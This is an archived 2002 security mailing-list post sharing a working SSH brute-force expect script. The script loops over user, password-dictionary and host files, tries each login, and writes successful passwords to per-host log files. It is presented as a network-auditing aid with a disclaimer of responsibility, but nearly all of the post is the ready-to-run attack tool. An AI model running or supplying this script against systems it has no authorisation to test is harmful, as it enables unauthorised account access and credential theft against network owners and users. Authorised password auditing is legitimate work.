('binary' encoding is not supported, stored as-is) This is an expect script that will allow you to specify a host file, user file, and a dictionary. Extremely useful for auditing large networks where you can't manually log into every machine or don't fee like re-running something on every host. Hope everyone finds it useful. #!/usr/bin/expect -f # # Written by James Shanahan (jshanahanat_private) # and Erin Palmer(epalmerat_private) # ssh brute forcer # This will alow you to specify hosts, password lists, and a user # I do not take any reponsibilty for what you do with this tool # Hopefully it will make your life easier rather then making other # peoples lives more difficult! set timeout 5 set dictionary [lindex $argv 0] set file [lindex $argv 1] set user [lindex $argv 2] if {[llength $argv] != 3} { puts stderr "Usage: $argv0 <dictionary-file> <hosts- file> <user-file>\n" exit } set tryHost [open $file r] set tryPass [open $dictionary r] set tryUser [open $user r] set passwords [read $tryPass] set hosts [read $tryHost] set login [read $tryUser] foreach username $login { foreach passwd $passwords { foreach ip $hosts { spawn ssh $username@$ip expect ":" send "$passwd\n" set logFile [open $ip.log a] expect "L" { puts $logFile "password for $username@$ip is $passwd\n" close $logFile } set id [exp_pid] exec kill -INT $id } } } James G. Shanahan Jr. Security Engineer Comcast Corporation ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
This archive was generated by hypermail 2b30 : Fri Jan 25 2002 - 15:18:26 PST